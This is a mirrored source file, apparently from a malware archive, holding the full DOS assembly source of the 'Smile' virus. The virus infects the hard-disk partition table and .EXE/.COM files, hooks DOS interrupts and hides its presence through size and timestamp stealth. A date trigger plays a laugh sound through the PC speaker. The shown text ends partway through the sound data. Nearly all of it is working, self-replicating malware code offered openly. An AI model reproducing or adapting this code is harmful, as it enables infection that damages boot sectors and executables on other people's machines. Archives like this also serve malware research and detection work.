mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
1143 lines
37 KiB
NASM
1143 lines
37 KiB
NASM
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Virus Name: Smile
|
|||
|
; Origin: Holland
|
|||
|
; Eff Length: 4,096 bytes
|
|||
|
; Type Code: PRhE - Parasitic Resident .EXE & partition table infector
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This program is assembled with TASM V1.01 from Borland International
|
|||
|
; (assembing with MASM V5.10 from Microsoft Inc. is also possible).
|
|||
|
;
|
|||
|
; TASM smile;
|
|||
|
; LINK smile,,smile;
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Interrupt vectors
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
iseg segment at 0
|
|||
|
org 8*4
|
|||
|
Int8o dw 0 ; interrupt vector 21h
|
|||
|
Int8s dw 0
|
|||
|
|
|||
|
org 1ch*4
|
|||
|
Int1Co dw 0 ; interrupt vector 21h
|
|||
|
Int1Cs dw 0
|
|||
|
|
|||
|
org 21h*4
|
|||
|
Int21o dw 0 ; interrupt vector 21h
|
|||
|
Int21s dw 0
|
|||
|
|
|||
|
iseg ends
|
|||
|
|
|||
|
cseg segment public 'code'
|
|||
|
assume cs:cseg,ds:cseg,es:cseg
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Header of EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
VirusSize equ 1580h ; size of virus
|
|||
|
; this one is very important,
|
|||
|
; if it isn't set right the
|
|||
|
; virus will hang every
|
|||
|
; infected file
|
|||
|
|
|||
|
PrgSize equ 73h ; size of prg after the virus
|
|||
|
; this is used in the header
|
|||
|
; of the dummy program
|
|||
|
|
|||
|
; the value of these constants
|
|||
|
; can be determined by creating
|
|||
|
; a map-file with the linker.
|
|||
|
|
|||
|
Signature dw 0 ; signature 'MZ'
|
|||
|
PartPage dw 0 ; size of partitial page
|
|||
|
PageCount dw 0 ; number of pages
|
|||
|
ReloCount dw 0 ; number of relocation items
|
|||
|
HeaderSize dw 0 ; size of header
|
|||
|
MinMem dw 0 ; minimum memory needed
|
|||
|
MaxMem dw 0 ; maximum memory needed
|
|||
|
ExeSS dw 0 ; initial SS
|
|||
|
ExeSP dw 0 ; initial SP
|
|||
|
CheckSum dw 0 ; unused ???
|
|||
|
ExeIP dw 0 ; initial IP
|
|||
|
ExeCS dw 0 ; initial CS
|
|||
|
ReloOffset dw 0 ; offset of relocationtable
|
|||
|
OverlayNr dw 0 ; number of overlay
|
|||
|
|
|||
|
ComSize dw -1 ; Size of com-file (-1 for exe)
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This procedure is called when starting from an exe-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Main: pushf ; save flags
|
|||
|
sub sp,4 ; reserve space far cs:ip
|
|||
|
push ax ; save other registers
|
|||
|
push ds
|
|||
|
push es
|
|||
|
sti ; enable interrupts
|
|||
|
cmp cs:ComSize,-1 ; com or exe-file
|
|||
|
je ExeFile ; -1 : exe-file
|
|||
|
ComFile: mov word ptr ds:[6],0fef0h ; set availeble memory to max
|
|||
|
mov bp,sp ; set cs:ip on stack for
|
|||
|
mov word ptr [bp+8],ds ; returning to the orginal
|
|||
|
mov word ptr [bp+6],100h ; program
|
|||
|
mov bp,ds ; bp : stacksegment
|
|||
|
mov ax,cs ; bx : begin of com-file
|
|||
|
add ax,(VirusSize/10h)
|
|||
|
mov bx,ax
|
|||
|
mov cx,0ff0h ; cx : size of data to move
|
|||
|
add ax,cx ; es : buffer for mover and
|
|||
|
mov es,ax ; infecting the bootsect.
|
|||
|
push cs ; ds : codesegment
|
|||
|
pop ds
|
|||
|
jmp short InfectBoot ; infect bootsector
|
|||
|
ExeFile: mov dx,cs ; Relocation
|
|||
|
add dx,(VirusSize/10h)
|
|||
|
mov ds,dx
|
|||
|
mov cx,ReloCount ; number of relocation items
|
|||
|
add dx,HeaderSize ; size of exe-header
|
|||
|
mov si,ReloOffset ; offset of 1st relocation item
|
|||
|
jcxz NoRelo
|
|||
|
NextRelo: lodsw ; offset
|
|||
|
mov di,ax
|
|||
|
lodsw ; segment
|
|||
|
add ax,dx
|
|||
|
mov es,ax
|
|||
|
mov ax,cs ; relocation factor
|
|||
|
add es:[di],ax
|
|||
|
loop NextRelo ; next relocation item
|
|||
|
NoRelo: mov bp,sp
|
|||
|
mov ax,cs ; set cs:ip on stack for
|
|||
|
add ax,ExeCS ; returning to the orginal
|
|||
|
mov [bp+8],ax ; program
|
|||
|
mov ax,ExeIP
|
|||
|
mov [bp+6],ax
|
|||
|
mov bp,cs ; bp : stacksegment
|
|||
|
add bp,ExeSS
|
|||
|
mov ax,PageCount ; calculate size of exe-file
|
|||
|
mov dx,PartPage ; in paragraphs
|
|||
|
add dx,-1
|
|||
|
sbb ax,0
|
|||
|
mov cl,4
|
|||
|
shr dx,cl
|
|||
|
inc dx
|
|||
|
inc cl
|
|||
|
shl ax,cl
|
|||
|
add dx,ax
|
|||
|
add dx,MinMem ; dx : size of exe-file
|
|||
|
mov cx,dx ; cx : size of code and data
|
|||
|
sub cx,HeaderSize
|
|||
|
mov bx,cs ; bx : start of code and data
|
|||
|
mov ds,bx
|
|||
|
add bx,(VirusSize/10h)
|
|||
|
add bx,dx
|
|||
|
mov es,bx ; es : buffer for mover and
|
|||
|
sub bx,cx ; infecting the bootsect.
|
|||
|
InfectBoot: push bx ; save bx and cx
|
|||
|
push cx
|
|||
|
mov ax,201h ; read bootsector from disk
|
|||
|
xor bx,bx
|
|||
|
mov cx,1
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
jc BootOk ; error ?
|
|||
|
mov si,offset BootSector ; compare with infected code
|
|||
|
xor di,di
|
|||
|
mov cx,1*BootSize
|
|||
|
cld
|
|||
|
repe cmpsb
|
|||
|
je BootOk ; equal ?
|
|||
|
mov di,1beh+8 ; check partitions, we don't
|
|||
|
mov cx,4 ; want to overwrite them
|
|||
|
NextPartition: cmp word ptr es:[di+2],0
|
|||
|
ja SectOk
|
|||
|
cmp word ptr es:[di],(VirusSize+1ffh)/200h+1
|
|||
|
ja SectOk
|
|||
|
cmp word ptr es:[di],0
|
|||
|
ja BootOk
|
|||
|
SectOk: add di,10h
|
|||
|
loop NextPartition
|
|||
|
mov si,offset BootSector ; exchange code from bootsector
|
|||
|
xor di,di ; with viral code
|
|||
|
mov cx,1*BootSize
|
|||
|
cld
|
|||
|
call Swapsb
|
|||
|
push es ; write virus to disk
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov ax,(VirusSize+1ffh)/200h+300h
|
|||
|
mov cx,2
|
|||
|
int 13h
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
jc BootOk ; error ?
|
|||
|
mov ax,301h ; write bootsector to disk
|
|||
|
mov cx,1
|
|||
|
int 13h
|
|||
|
BootOk: pop cx ; restore bx and cx
|
|||
|
pop bx
|
|||
|
mov dx,cs ; dx = destenation segment
|
|||
|
xor di,di
|
|||
|
push es ; push seg:ofs of mover
|
|||
|
push di
|
|||
|
push cx ; save cx
|
|||
|
mov cx,1*MoverSize
|
|||
|
mov si,offset Mover
|
|||
|
cld ; copy mover-procedure
|
|||
|
rep movsb
|
|||
|
pop cx ; restore cx
|
|||
|
cli ; disable interrupts
|
|||
|
retf ; jump to mover
|
|||
|
|
|||
|
Mover: mov ax,cx ; save cx
|
|||
|
mov ds,bx ; ds:si = source
|
|||
|
mov es,dx ; es:di = destenation
|
|||
|
xor si,si
|
|||
|
xor di,di
|
|||
|
mov cx,8h ; copy one paragraph
|
|||
|
rep movsw
|
|||
|
inc bx
|
|||
|
inc dx
|
|||
|
mov cx,ax ; restore cx
|
|||
|
loop Mover ; next paragraph
|
|||
|
mov ss,bp ; ss = new stacksegment
|
|||
|
sti ; enable interrupts
|
|||
|
pop es ; restore registers
|
|||
|
pop ds
|
|||
|
pop ax
|
|||
|
iret ; jump to program
|
|||
|
|
|||
|
MoverSize equ ($-Mover)
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Bootsector startup
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Bootsector: cli ; disable interrupts
|
|||
|
xor bx,bx ; setup stack and ds
|
|||
|
mov ds,bx
|
|||
|
mov ss,bx
|
|||
|
mov sp,7c00h
|
|||
|
sti ; enable interrupts
|
|||
|
mov ax,ds:[413h] ; get size of base memory
|
|||
|
sub ax,(VirusSize+3ffh)/400h; subtract virussize
|
|||
|
mov ds:[413h],ax ; store new memory size
|
|||
|
mov cl,6 ; calculate segment
|
|||
|
shl ax,cl
|
|||
|
mov es,ax ; load virus in reserved mem
|
|||
|
mov ax,(VirusSize+1ffh)/200h+200h
|
|||
|
mov cx,2
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
mov bx,offset StartUp ; bx=offset startup
|
|||
|
push es ; jump to startup (es:bx)
|
|||
|
push bx
|
|||
|
retf
|
|||
|
|
|||
|
BootSize equ ($-Bootsector) ; size of bootsector part
|
|||
|
|
|||
|
StartUp: cli ; disable interrupts
|
|||
|
mov ax,offset Interrupt1C ; hack interrupt 1C
|
|||
|
xchg ax,ds:Int1Co
|
|||
|
mov cs:OldInt1Co,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int1Cs
|
|||
|
mov cs:OldInt1Cs,ax
|
|||
|
mov cs:OldInt21o,-1
|
|||
|
mov cs:OldInt21s,-1
|
|||
|
mov cs:Count,-1
|
|||
|
sti ; enable interrupts
|
|||
|
push cs ; ds=cs
|
|||
|
pop es
|
|||
|
mov si,7c00h ; di=7c00h (Bootsector)
|
|||
|
mov di,offset BootSector ; si=BootSector
|
|||
|
mov cx,1*BootSize ; bytes to copy
|
|||
|
cld ; copy forward
|
|||
|
call Swapsb ; restore orginal boot
|
|||
|
mov ax,7c00h ; offset bootsector
|
|||
|
push ds ; jump to bootsector
|
|||
|
push ax
|
|||
|
retf
|
|||
|
|
|||
|
Interrupt8: push ax ; save registers
|
|||
|
push si
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov si,SampleOffset ; get offset of next bit
|
|||
|
dec byte ptr ds:SampleBit
|
|||
|
test byte ptr ds:SampleBit,7
|
|||
|
jnz OfsOk
|
|||
|
inc si
|
|||
|
cmp si,offset SampleEnd ; end of sample ?
|
|||
|
jb OfsOk ; no, play bit
|
|||
|
mov al,34h ; reset int 8 frequency
|
|||
|
out 43h,al
|
|||
|
xor ax,ax
|
|||
|
out 40h,al
|
|||
|
out 40h,al
|
|||
|
mov ds,ax ; reset int 8 vector
|
|||
|
mov ax,cs:OldInt8o
|
|||
|
mov ds:Int8o,ax
|
|||
|
mov ax,cs:OldInt8s
|
|||
|
mov ds:Int8s,ax
|
|||
|
inc byte ptr cs:SampleFlag ; set sample ready flag
|
|||
|
jmp short ExitInt8 ; end of interrupt
|
|||
|
OfsOk: mov SampleOffset,si ; store offset
|
|||
|
rol byte ptr ds:[si],1 ; next bit
|
|||
|
mov ah,ds:[si] ; get bit value
|
|||
|
and ah,1
|
|||
|
shl ah,1
|
|||
|
in al,61h ; get value of io-port 61h
|
|||
|
and al,0fch ; reset last 2 bits
|
|||
|
or al,ah ; set bit 2 with sample value
|
|||
|
out 61h,al ; write to io-port 61h
|
|||
|
ExitInt8: mov al,20h ; end of interrupt signal
|
|||
|
out 20h,al
|
|||
|
pop ds ; restore registers
|
|||
|
pop si
|
|||
|
pop ax
|
|||
|
iret ; return to program
|
|||
|
|
|||
|
Interrupt1C: push ds ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
xor ax,ax ; interrupts vectors
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:Int21o
|
|||
|
cmp cs:OldInt21o,ax
|
|||
|
jne Changed
|
|||
|
mov ax,ds:Int21s
|
|||
|
cmp cs:OldInt21s,ax
|
|||
|
je Equal
|
|||
|
Changed: mov ax,ds:Int21o
|
|||
|
mov cs:OldInt21o,ax
|
|||
|
mov ax,ds:Int21s
|
|||
|
mov cs:OldInt21s,ax
|
|||
|
mov cs:Count,182
|
|||
|
jmp short NotReady
|
|||
|
Equal: dec cs:Count
|
|||
|
jnz NotReady
|
|||
|
mov ax,cs:OldInt1Co ; restore vector 1C
|
|||
|
mov ds:Int1Co,ax ; (This interrupt)
|
|||
|
mov ax,cs:OldInt1Cs
|
|||
|
mov ds:Int1Cs,ax
|
|||
|
mov ax,offset Interrupt21 ; Hack interrupt 21
|
|||
|
xchg ax,ds:Int21o
|
|||
|
mov cs:OldInt21o,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int21s
|
|||
|
mov cs:OldInt21s,ax
|
|||
|
mov ax,16
|
|||
|
mov bx,offset Handle
|
|||
|
NextHandle: mov byte ptr cs:[bx],0
|
|||
|
inc bx
|
|||
|
dec ax
|
|||
|
jnz NextHandle
|
|||
|
mov byte ptr cs:Active,-1
|
|||
|
NotReady: pop bx
|
|||
|
pop ax ; restore registers
|
|||
|
pop ds
|
|||
|
jmp cs:OldInt1C ; do orginal int 1C
|
|||
|
|
|||
|
Swapsb: mov al,es:[di] ; exchange two memory bytes
|
|||
|
xchg al,ds:[si]
|
|||
|
stosb
|
|||
|
inc si
|
|||
|
loop Swapsb ; next byte
|
|||
|
ret ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Manipilated functions
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Functions db 11h ; 1
|
|||
|
dw offset FindFCB
|
|||
|
db 12h ; 2
|
|||
|
dw offset FindFCB
|
|||
|
db 30h ; 3
|
|||
|
dw offset DosVersion
|
|||
|
db 3ch ; 4
|
|||
|
dw offset Open
|
|||
|
db 3dh ; 5
|
|||
|
dw offset Open
|
|||
|
db 3eh ; 6
|
|||
|
dw offset Close
|
|||
|
db 42h ; 7
|
|||
|
dw offset Seek
|
|||
|
db 45h ; 8
|
|||
|
dw offset Duplicate
|
|||
|
db 46h ; 9
|
|||
|
dw offset Redirect
|
|||
|
db 4eh ; 10
|
|||
|
dw offset Find
|
|||
|
db 4fh ; 11
|
|||
|
dw offset Find
|
|||
|
db 5bh ; 12
|
|||
|
dw offset Open
|
|||
|
db 6ch ; 13
|
|||
|
dw offset OpenCreate
|
|||
|
|
|||
|
FunctionCount equ 13
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; The orginal interrupt 21h is redirected to this procedure
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
DosVersion: push ax
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
cmp cs:Active,0
|
|||
|
je NotActive
|
|||
|
mov ah,2ah
|
|||
|
call DOS
|
|||
|
cmp ActiveYear,cx
|
|||
|
jb NotActive
|
|||
|
cmp ActiveDate,dx
|
|||
|
jb NotActive
|
|||
|
cli
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ax,offset Interrupt8
|
|||
|
xchg ax,ds:Int8o
|
|||
|
mov cs:OldInt8o,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int8s
|
|||
|
mov cs:OldInt8s,ax
|
|||
|
mov al,34h
|
|||
|
out 43h,al
|
|||
|
mov al,80h
|
|||
|
out 40h,al
|
|||
|
mov al,0
|
|||
|
out 40h,al
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov byte ptr SampleFlag,0
|
|||
|
mov byte ptr SampleBit,0
|
|||
|
mov word ptr SampleOffset,offset SampleData
|
|||
|
sti
|
|||
|
Delay: cmp byte ptr SampleFlag,0
|
|||
|
je Delay
|
|||
|
mov byte ptr Active,0
|
|||
|
NotActive: pop ds
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
jmp Old21
|
|||
|
|
|||
|
FindFCB: call DOS ; call orginal interrupt
|
|||
|
cmp al,0 ; error ?
|
|||
|
jne Ret1
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh ; get DTA
|
|||
|
call DOS
|
|||
|
cmp byte ptr es:[bx],-1 ; extended fcb ?
|
|||
|
jne FCBOk
|
|||
|
add bx,8 ; yes, skip 8 bytes
|
|||
|
FCBOk: mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ch],VirusSize
|
|||
|
sbb word ptr es:[bx+1eh],0 ; adjust file-size
|
|||
|
jmp short Time
|
|||
|
|
|||
|
Find: call DOS ; call orginal interrupt
|
|||
|
jc Ret1 ; error ?
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh
|
|||
|
call DOS
|
|||
|
mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ah],VirusSize
|
|||
|
sbb word ptr es:[bx+1ch],0 ; change file-size
|
|||
|
Time: xor byte ptr es:[bx+16h],1fh; adjust file-time
|
|||
|
FileOk: pop es ; restore registers
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret1: retf 2 ; return
|
|||
|
|
|||
|
Seek: or bx,bx ; bx=0 ?
|
|||
|
jz Old21 ; yes, do orginal interrupt
|
|||
|
push bx
|
|||
|
call FindHandle
|
|||
|
pop bx
|
|||
|
jc Old21
|
|||
|
Stealth: or al,al ; seek from top of file ?
|
|||
|
jnz Relative ; no, don't change cx:dx
|
|||
|
add dx,VirusSize ; change cx:dx
|
|||
|
adc cx,0
|
|||
|
Relative: call DOS ; Execute orginal int 21h
|
|||
|
jc Ret1 ; Error ?
|
|||
|
sub ax,VirusSize ; adjust dx:ax
|
|||
|
sbb dx,0
|
|||
|
jmp short Ret1 ; return
|
|||
|
|
|||
|
Close: or bx,bx ; bx=0 ?
|
|||
|
je Old21 ; yes, do orginal interrupt
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push ds
|
|||
|
push cs ; ds=cs
|
|||
|
pop ds
|
|||
|
push bx
|
|||
|
call FindHandle
|
|||
|
mov si,bx
|
|||
|
pop bx
|
|||
|
jc DoNotUpdate
|
|||
|
mov word ptr ds:[si],0
|
|||
|
cmp byte ptr ds:[si+2],0
|
|||
|
je DoNotUpdate
|
|||
|
call UpdateHeader
|
|||
|
DoNotUpdate: pop ds ; restore registers
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
Not2: jmp short Old21 ; continue with orginal int
|
|||
|
|
|||
|
Interrupt21: push bx ; after an int 21h instruction
|
|||
|
push cx ; this procedure is started
|
|||
|
mov bx,offset Functions
|
|||
|
mov cx,FunctionCount
|
|||
|
NxtFn: cmp ah,cs:[bx] ; search function
|
|||
|
je FunctionTrap
|
|||
|
add bx,3
|
|||
|
loop NxtFn
|
|||
|
pop cx ; function not found
|
|||
|
pop bx
|
|||
|
Old21: jmp cs:OldInt21
|
|||
|
|
|||
|
FunctionTrap: push bp ; function found, start viral
|
|||
|
mov bp,sp ; version of function
|
|||
|
mov bx,cs:[bx+1]
|
|||
|
xchg bx,[bp+4]
|
|||
|
mov cx,[bp+10]
|
|||
|
xchg cx,[bp+2]
|
|||
|
pop bp
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
Duplicate: call DOS
|
|||
|
jc Error
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
push dx
|
|||
|
call FindHandle
|
|||
|
jc Ret3
|
|||
|
mov dl,cs:[bx+2]
|
|||
|
mov bx,ax
|
|||
|
call StoreHandle
|
|||
|
Ret3: pop dx
|
|||
|
pop bx
|
|||
|
popf
|
|||
|
jmp Ret2
|
|||
|
|
|||
|
Redirect: call DOS
|
|||
|
jc Error
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
xchg bx,cx
|
|||
|
call FindHandle
|
|||
|
jc Ret4
|
|||
|
mov cs:[bx],cx
|
|||
|
Ret4: pop cx
|
|||
|
pop bx
|
|||
|
popf
|
|||
|
jmp Ret2
|
|||
|
|
|||
|
OpenCreate: or al,al ; extended open/create function
|
|||
|
jne Old21 ; no, do orginal interrupt 21
|
|||
|
push dx ; save dx
|
|||
|
mov dx,si ; check extension of filename
|
|||
|
call CheckName
|
|||
|
pop dx ; retore dx
|
|||
|
jc Old21 ; exe or com-file?
|
|||
|
jmp short ExtensionOk ; yes, infect file or use
|
|||
|
; stealth
|
|||
|
|
|||
|
Open: call CheckName ; exe or com-file ?
|
|||
|
jc Old21 ; no, do orginal int 21
|
|||
|
ExtensionOk: call DOS ; do interrupt 21
|
|||
|
jnc NoError ; error ?
|
|||
|
Error: jmp Ret2 ; yes, return and do nothing
|
|||
|
NoError: pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,ax ; bx = file handle
|
|||
|
mov ax,4400h ; get device information
|
|||
|
call DOS
|
|||
|
jc PopRet ; error ?
|
|||
|
test dx,80h ; character device
|
|||
|
jnz PopRet ; yes, return and do nothing
|
|||
|
call EndOfFile ; get file size
|
|||
|
or ax,dx ; 0 ?
|
|||
|
jnz FileExists ; no, file already existed
|
|||
|
FileCreated: call HandleFree
|
|||
|
jc PopRet
|
|||
|
mov ah,2ah
|
|||
|
call DOS
|
|||
|
add dh,3
|
|||
|
cmp dh,12
|
|||
|
jbe DateOk
|
|||
|
inc cx
|
|||
|
sub dh,12
|
|||
|
DateOk: mov ActiveYear,cx
|
|||
|
mov ActiveDate,dx
|
|||
|
mov ah,40h ; write virus to file
|
|||
|
mov cx,VirusSize
|
|||
|
call Zero2
|
|||
|
jc NoVir ; error ? yes, return
|
|||
|
xor ax,cx ; entire virus written ?
|
|||
|
jnz NoVir ; no, return
|
|||
|
mov dl,1
|
|||
|
call StoreHandle
|
|||
|
jmp short PopRet ; return
|
|||
|
FileExists: call TopOfFile ; go to top of file
|
|||
|
call HandleFree
|
|||
|
jc PopRet ; no, do nothing
|
|||
|
call ReadHeader ; read exe-header
|
|||
|
jc NoVir ; error ?
|
|||
|
xor ax,cx ; entire header read
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp Signature,5a4dh ; signature = 'MZ' ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp HeaderSize,ax ; headersize = 0 ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp CheckSum,0DEADh ; checksum = DEAD hex
|
|||
|
jne NoVir ; no, not infected
|
|||
|
mov dl,0
|
|||
|
call StoreHandle
|
|||
|
mov dx,VirusSize ; seek to end of virus
|
|||
|
jmp short Infected
|
|||
|
NoVir: xor dx,dx
|
|||
|
Infected: xor cx,cx ; go to end of virus if file
|
|||
|
mov ax,4200h ; is infected
|
|||
|
call DOS
|
|||
|
PopRet: pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret2: retf 2 ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
EndOfFile: mov ax,4202h ; go to end of file
|
|||
|
jmp short Zero1
|
|||
|
|
|||
|
TopOfFile: mov ax,4200h ; go to top of file
|
|||
|
Zero1: xor cx,cx
|
|||
|
jmp short Zero2
|
|||
|
|
|||
|
WriteHeader: mov ah,40h ; write exe-header to file
|
|||
|
jmp short Hdr
|
|||
|
|
|||
|
ReadHeader: mov ah,3fh ; read exe-header from file
|
|||
|
Hdr: mov cx,1eh
|
|||
|
Zero2: xor dx,dx
|
|||
|
|
|||
|
DOS: pushf ; call orginal interrupt
|
|||
|
call cs:OldInt21
|
|||
|
ret
|
|||
|
|
|||
|
FindHandle: push ax
|
|||
|
push cx
|
|||
|
mov ax,bx
|
|||
|
mov bx,offset Handle
|
|||
|
mov cx,8
|
|||
|
NotFound: cmp ax,cs:[bx]
|
|||
|
je Found
|
|||
|
inc bx
|
|||
|
inc bx
|
|||
|
inc bx
|
|||
|
loop NotFound
|
|||
|
stc
|
|||
|
Found: pop cx
|
|||
|
pop ax
|
|||
|
ret
|
|||
|
|
|||
|
HandleFree: push bx
|
|||
|
xor bx,bx
|
|||
|
call FindHandle
|
|||
|
pop bx
|
|||
|
ret
|
|||
|
|
|||
|
StoreHandle: push bx
|
|||
|
push bx
|
|||
|
xor bx,bx
|
|||
|
call FindHandle
|
|||
|
pop cs:[bx]
|
|||
|
mov cs:[bx+2],dl
|
|||
|
pop bx
|
|||
|
ret
|
|||
|
|
|||
|
CheckName: push ax ; check for .exe or .com
|
|||
|
push cx ; save registers
|
|||
|
push si
|
|||
|
push di
|
|||
|
xor ah,ah ; point found = 0
|
|||
|
mov cx,100h ; max length filename = 100h
|
|||
|
mov si,dx ; si = start of filename
|
|||
|
cld
|
|||
|
NxtChr: lodsb ; get byte
|
|||
|
or al,al ; 0 ?
|
|||
|
je EndName ; yes, check extension
|
|||
|
cmp al,'\' ; \ ?
|
|||
|
je Slash ; yes, point found = 0
|
|||
|
cmp al,'.' ; . ?
|
|||
|
je Point ; yes, point found = 1
|
|||
|
loop NxtChr ; next character
|
|||
|
jmp short EndName ; check extension
|
|||
|
Slash: xor ah,ah ; point found = 0
|
|||
|
jmp NxtChr ; next character
|
|||
|
Point: inc ah ; point found = 1
|
|||
|
mov di,si ; di = start of extension
|
|||
|
jmp NxtChr ; next character
|
|||
|
EndName: cmp ah,1 ; point found = 0
|
|||
|
jne NotExe ; yes, not an exe-file
|
|||
|
mov si,di ; si = start of extension
|
|||
|
lodsw ; first 2 characters
|
|||
|
and ax,0dfdfh ; uppercase
|
|||
|
mov cx,ax
|
|||
|
lodsb ; 3rd character
|
|||
|
and al,0dfh ; uppercase
|
|||
|
cmp cx,04f43h ; extension = .com ?
|
|||
|
jne NotCom
|
|||
|
cmp al,04dh
|
|||
|
je ChkRet
|
|||
|
NotCom: cmp cx,05845h ; extension = .exe ?
|
|||
|
jne NotExe
|
|||
|
cmp al,045h
|
|||
|
je ChkRet
|
|||
|
NotExe: stc ; set carry flag
|
|||
|
ChkRet: pop di ; restore registers
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
ret ; return
|
|||
|
|
|||
|
UpdateHeader: mov ax,4200h ; position read/write pointer
|
|||
|
xor cx,cx ; at the end of the virus
|
|||
|
mov dx,VirusSize
|
|||
|
call DOS
|
|||
|
call ReadHeader ; read orginal exe-header
|
|||
|
cmp Signature,5a4dh
|
|||
|
je InfectExe
|
|||
|
InfectCom: mov Signature,5a4dh
|
|||
|
mov ReloOffset,01ch
|
|||
|
mov OverlayNr,0
|
|||
|
mov ExeSS,(VirusSize-100h)/10h
|
|||
|
mov ExeSP,0fffeh
|
|||
|
call EndOfFile
|
|||
|
sub ax,VirusSize
|
|||
|
sbb dx,0
|
|||
|
mov ComSize,ax
|
|||
|
mov cx,10h
|
|||
|
div cx
|
|||
|
sub dx,1
|
|||
|
mov dx,0ff2h+20h
|
|||
|
sbb dx,ax
|
|||
|
mov MinMem,dx
|
|||
|
jmp WriteIt
|
|||
|
InfectExe: mov ComSize,-1
|
|||
|
mov ax,(VirusSize/10h)
|
|||
|
add ax,HeaderSize
|
|||
|
add ExeSS,ax
|
|||
|
add MinMem,20h
|
|||
|
add MaxMem,20h
|
|||
|
jnc MaxOk
|
|||
|
WriteIt: mov MaxMem,0ffffh
|
|||
|
MaxOk: mov ReloCount,0
|
|||
|
mov HeaderSize,0
|
|||
|
mov CheckSum,0DEADh
|
|||
|
mov ExeCS,0
|
|||
|
mov ExeIP,offset Main
|
|||
|
call EndOfFile
|
|||
|
mov cx,200h
|
|||
|
div cx
|
|||
|
mov PartPage,dx
|
|||
|
add dx,-1
|
|||
|
adc ax,0
|
|||
|
mov PageCount,ax
|
|||
|
call TopOfFile
|
|||
|
call WriteHeader ; write header at the top of
|
|||
|
jc InfErr ; the virus
|
|||
|
mov ax,5700h
|
|||
|
call DOS
|
|||
|
mov ax,5701h
|
|||
|
or cl,1fh
|
|||
|
call DOS
|
|||
|
InfErr: ret
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Data to generate the Laugh sound
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
SampleData db 249,220,204,102, 51, 51,116,102,227, 6, 28,216,243,129,131, 54
|
|||
|
db 140,204,226,227, 51, 18, 25,184, 98,199,131, 30, 25,204,204,193
|
|||
|
db 230, 79, 28,248, 98,241,142,199, 51, 24,228,249,179, 44,221,241
|
|||
|
db 54, 71,254, 46, 8,255,139,227, 59,196,241, 49,198,208,243,205
|
|||
|
db 193,115,155,131,206, 46, 14,177,176, 51,205,129,158, 54,142,113
|
|||
|
db 144,115,140,135, 56,240, 55,205,131,188,124, 51,199,195,156,120
|
|||
|
